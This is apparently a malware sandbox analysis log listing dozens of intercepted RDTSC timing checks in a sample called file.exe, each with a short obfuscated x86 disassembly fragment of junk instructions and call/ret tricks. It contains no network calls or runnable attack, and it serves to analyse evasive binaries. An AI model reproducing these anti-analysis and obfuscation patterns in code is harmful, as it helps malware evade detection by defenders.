Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCEFF7 second address: FCEFFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCEFFD second address: FCF02F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xor dword ptr [esp], 18566F87h 0x0000000c mov esi, dword ptr [ebp+122D3551h] 0x00000012 lea ebx, dword ptr [ebp+12442E3Fh] 0x00000018 mov si, ax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e jmp 00007F7014CC2CC2h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCF20C second address: FCF213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCF213 second address: FCF2CA instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7014CC2CB8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jns 00007F7014CC2CC4h 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007F7014CC2CB8h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 00000019h 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e push 00000000h 0x00000030 pushad 0x00000031 or dword ptr [ebp+122D2361h], eax 0x00000037 call 00007F7014CC2CC1h 0x0000003c and eax, 29E0773Eh 0x00000042 pop eax 0x00000043 popad 0x00000044 push 42C2EEF1h 0x00000049 jg 00007F7014CC2CC4h 0x0000004f xor dword ptr [esp], 42C2EE71h 0x00000056 mov si, C616h 0x0000005a push 00000003h 0x0000005c sub cl, 0000007Fh 0x0000005f push 00000000h 0x00000061 mov si, 7396h 0x00000065 jnl 00007F7014CC2CBCh 0x0000006b sbb edi, 5DAC348Ch 0x00000071 push 00000003h 0x00000073 sub dword ptr [ebp+122D2F6Dh], ecx 0x00000079 call 00007F7014CC2CB9h 0x0000007e push eax 0x0000007f push edx 0x00000080 push esi 0x00000081 pushad 0x00000082 popad 0x00000083 pop esi 0x00000084 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCF2CA second address: FCF2CF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCF2CF second address: FCF30C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edi 0x00000009 jbe 00007F7014CC2CC7h 0x0000000f jmp 00007F7014CC2CC1h 0x00000014 pop edi 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F7014CC2CC6h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCF30C second address: FCF312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCF312 second address: FCF32F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7014CC2CC0h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCF32F second address: FCF34E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F70146AC612h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCF34E second address: FCF353 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCF353 second address: FCF359 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCF359 second address: FCF3C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F7014CC2CB8h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 0000001Bh 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 sub esi, 7F4B1D79h 0x00000028 lea ebx, dword ptr [ebp+12442E53h] 0x0000002e mov esi, dword ptr [ebp+122D2C1Ah] 0x00000034 xchg eax, ebx 0x00000035 jmp 00007F7014CC2CC8h 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e jng 00007F7014CC2CB6h 0x00000044 jmp 00007F7014CC2CBBh 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE1CFC second address: FE1D00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE1D00 second address: FE1D0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE1D0A second address: FE1D0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FEE950 second address: FEE969 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7014CC2CC5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FEEFC3 second address: FEEFC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FEEFC7 second address: FEEFCF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FEEFCF second address: FEEFEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC616h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC5C2C second address: FC5C30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC5C30 second address: FC5C34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FEF968 second address: FEF96D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FEFF15 second address: FEFF22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F70146AC608h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FEFF22 second address: FEFF5D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F7014CC2CBEh 0x0000000e push eax 0x0000000f jmp 00007F7014CC2CC9h 0x00000014 jg 00007F7014CC2CB6h 0x0000001a pop eax 0x0000001b push esi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FEFF5D second address: FEFF63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FEFF63 second address: FEFF6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FEFF6B second address: FEFF71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF00CB second address: FF00D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF00D0 second address: FF00EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F70146AC618h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF00EE second address: FF010E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007F7014CC2CC5h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF010E second address: FF0148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F70146AC606h 0x0000000a jns 00007F70146AC606h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F70146AC619h 0x00000018 jmp 00007F70146AC60Eh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF0148 second address: FF014C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF014C second address: FF0155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF02D1 second address: FF02E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7014CC2CBFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF02E4 second address: FF02E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF02E8 second address: FF02EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF39D5 second address: FF39F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F70146AC617h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF39F8 second address: FF39FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF3B9A second address: FF3B9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFB02E second address: FFB044 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F7014CC2CC1h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFB559 second address: FFB573 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F70146AC612h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFD558 second address: FFD589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f pop eax 0x00000010 ja 00007F7014CC2CB6h 0x00000016 popad 0x00000017 popad 0x00000018 push ecx 0x00000019 pushad 0x0000001a jmp 00007F7014CC2CBBh 0x0000001f pushad 0x00000020 popad 0x00000021 jno 00007F7014CC2CB6h 0x00000027 popad 0x00000028 push ebx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFD589 second address: FFD58F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFF57F second address: FFF5CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F7014CC2CC0h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xor dword ptr [esp], 155938A4h 0x00000014 push 00000000h 0x00000016 push ebx 0x00000017 call 00007F7014CC2CB8h 0x0000001c pop ebx 0x0000001d mov dword ptr [esp+04h], ebx 0x00000021 add dword ptr [esp+04h], 00000016h 0x00000029 inc ebx 0x0000002a push ebx 0x0000002b ret 0x0000002c pop ebx 0x0000002d ret 0x0000002e call 00007F7014CC2CB9h 0x00000033 jng 00007F7014CC2CC0h 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFF5CE second address: FFF60E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F70146AC618h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jmp 00007F70146AC611h 0x00000016 mov eax, dword ptr [eax] 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b js 00007F70146AC606h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFF60E second address: FFF612 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFF76E second address: FFF772 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFF956 second address: FFF95B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1000226 second address: 100022A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1000445 second address: 1000453 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7014CC2CBAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1000778 second address: 1000789 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jno 00007F70146AC606h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1000789 second address: 100079F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F7014CC2CBDh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100083D second address: 1000841 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1000DB0 second address: 1000DB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100175F second address: 10017C1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F70146AC61Ah 0x00000008 jmp 00007F70146AC614h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007F70146AC608h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 00000018h 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a mov esi, dword ptr [ebp+122D1D2Dh] 0x00000030 push 00000000h 0x00000032 mov dword ptr [ebp+122D1F8Bh], eax 0x00000038 push 00000000h 0x0000003a mov esi, ecx 0x0000003c xchg eax, ebx 0x0000003d push edi 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F70146AC60Dh 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1002730 second address: 1002734 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1003284 second address: 1003289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1003289 second address: 1003296 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1003296 second address: 10032E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jbe 00007F70146AC610h 0x0000000b jmp 00007F70146AC60Ah 0x00000010 popad 0x00000011 nop 0x00000012 mov edi, 77B61C86h 0x00000017 push 00000000h 0x00000019 mov esi, dword ptr [ebp+122D1F52h] 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push ebx 0x00000024 call 00007F70146AC608h 0x00000029 pop ebx 0x0000002a mov dword ptr [esp+04h], ebx 0x0000002e add dword ptr [esp+04h], 0000001Ah 0x00000036 inc ebx 0x00000037 push ebx 0x00000038 ret 0x00000039 pop ebx 0x0000003a ret 0x0000003b mov dword ptr [ebp+122D1801h], eax 0x00000041 push eax 0x00000042 pushad 0x00000043 push ecx 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10032E9 second address: 10032F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10032F2 second address: 10032F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10053D1 second address: 10053EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7014CC2CC5h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10053EB second address: 1005442 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F70146AC608h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 push 00000000h 0x00000027 ja 00007F70146AC606h 0x0000002d push 00000000h 0x0000002f pushad 0x00000030 jmp 00007F70146AC60Fh 0x00000035 add dword ptr [ebp+122D27DBh], eax 0x0000003b popad 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f js 00007F70146AC608h 0x00000045 pushad 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1006AC1 second address: 1006AE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edx 0x00000006 jnc 00007F7014CC2CB6h 0x0000000c pop edx 0x0000000d popad 0x0000000e nop 0x0000000f movsx esi, ax 0x00000012 push 00000000h 0x00000014 mov di, dx 0x00000017 push 00000000h 0x00000019 mov esi, ebx 0x0000001b push eax 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1006AE2 second address: 1006AE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1006AE6 second address: 1006AEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100760F second address: 1007655 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F70146AC60Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov esi, dword ptr [ebp+122D36E5h] 0x00000011 push 00000000h 0x00000013 mov edi, 3D085344h 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push edx 0x0000001d call 00007F70146AC608h 0x00000022 pop edx 0x00000023 mov dword ptr [esp+04h], edx 0x00000027 add dword ptr [esp+04h], 00000015h 0x0000002f inc edx 0x00000030 push edx 0x00000031 ret 0x00000032 pop edx 0x00000033 ret 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 pushad 0x00000039 popad 0x0000003a pushad 0x0000003b popad 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100925C second address: 1009260 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1009260 second address: 1009274 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC610h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100ACA7 second address: 100ACB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100ACB0 second address: 100ACB5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1007F48 second address: 1007F5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F7014CC2CBCh 0x0000000e jnc 00007F7014CC2CB6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1007F5C second address: 1007F77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70146AC617h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100C9AF second address: 100C9CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7014CC2CC3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100C9CA second address: 100C9DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F70146AC60Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100D52E second address: 100D538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100D538 second address: 100D553 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F70146AC606h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007F70146AC60Ch 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100D553 second address: 100D563 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7014CC2CBBh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100D995 second address: 100D99B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100D99B second address: 100D9F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push esi 0x0000000a pop edi 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F7014CC2CB8h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 stc 0x00000028 jmp 00007F7014CC2CBDh 0x0000002d push 00000000h 0x0000002f xchg eax, esi 0x00000030 pushad 0x00000031 jmp 00007F7014CC2CC9h 0x00000036 push eax 0x00000037 push edx 0x00000038 push edi 0x00000039 pop edi 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100D9F3 second address: 100DA1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC611h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F70146AC612h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100FA31 second address: 100FA5C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7014CC2CC6h 0x00000008 jmp 00007F7014CC2CC0h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 jmp 00007F7014CC2CBCh 0x00000018 pop esi 0x00000019 rdtsc
